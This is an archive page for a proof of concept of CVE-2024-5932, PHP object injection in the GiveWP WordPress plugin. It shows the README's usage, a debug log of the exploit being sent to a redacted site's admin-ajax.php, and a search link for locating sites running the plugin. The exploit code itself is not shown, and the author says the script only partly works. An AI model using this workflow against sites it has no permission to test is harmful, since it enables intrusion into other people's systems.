Associated Vulnerability
Description
Proof-of-Concept for CVE-2024-5932 GiveWP PHP Object Injection
Readme
# CVE-2024-5932-PoC
Proof-of-Concept for CVE-2024-5932 GiveWP PHP Object Injection
# ⚠️⚠️Kinda works but doesn't. Need Help⚠️⚠️
# Usage
```sh
python3 exploit.py
```
The script will ask you to set the target URL and the URL where the Donation form is located.
```sh
┌──(root💀)-[~/CVE-2024-5932-PoC]
└─# python3 exploit.py
Enter the target domain (e.g., example.com):
Please enter the full donation form URL (e.g., https://example.com/donations/donation-form):
```
# Output
```sh
┌──(root💀)-[~/CVE-2024-5932-PoC]
└─# python3 exploit.py
Please enter the domain (e.g., example.com): xxxxxxxx.org
Please enter the full donation form URL (e.g., https://example.com/donations/donation-form): https://xxxxxxxx.org/donations/donation-form/2024-08-22 15:16:52,154 - DEBUG - Attempting to access: https://xxxxxxxx.org/donations/donation-form/
2024-08-22 15:16:52,156 - DEBUG - Starting new HTTPS connection (1): xxxxxxxx.org:443
2024-08-22 15:16:52,580 - DEBUG - https://xxxxxxxx.org:443 "GET /donations/donation-form/ HTTP/1.1" 200 17518
2024-08-22 15:16:52,709 - DEBUG - Received response with status code: 200
2024-08-22 15:16:52,721 - DEBUG - Searching for donation form in the page HTML...
2024-08-22 15:16:52,722 - DEBUG - Donation form found.
2024-08-22 15:16:52,723 - DEBUG - Payload prepared successfully.
2024-08-22 15:16:52,723 - INFO - Sending exploit to https://xxxxxxxx.org/wp-admin/admin-ajax.php...
2024-08-22 15:16:52,723 - DEBUG - Preparing payload...
2024-08-22 15:16:52,724 - DEBUG - Starting new HTTPS connection (1): xxxxxxxx.org:443
2024-08-22 15:16:54,462 - DEBUG - https://xxxxxxxx.org:443 "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 None
2024-08-22 15:16:54,462 - DEBUG - Exploit response status code: 200
2024-08-22 15:16:54,462 - INFO - Exploit sent successfully!
```
# Hunter Search
https://hunter.how/list?searchValue=web.body%3D%22%2Fwp-content%2Fplugins%2Fgive%22
# DISCLAIMER:
This script is provided for educational and research purposes only. The intent of this tool is to help security researchers and penetration testers identify vulnerabilities in systems that they have explicit permission to test. Unauthorized access to computer systems is illegal and unethical.
By using this script, you agree to take full responsibility for any actions performed with it. The author and contributors to this script are not responsible for any damages or legal consequences that may arise from its use. Ensure that you have proper authorization before testing any systems with this tool.
Use this tool responsibly and only on systems for which you have explicit permission to perform security testing.
If you are unsure about the legality of your actions, consult with a legal professional before proceeding.
File Snapshot
[4.0K] /data/pocs/3904fe821d9bc5f0b0801dc686af356fe03f2d0d
├── [4.2K] exploit.py
├── [1.0K] LICENSE
└── [2.7K] README.md
0 directories, 3 files
Remarks
1. It is advised to access via the original source first.
2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →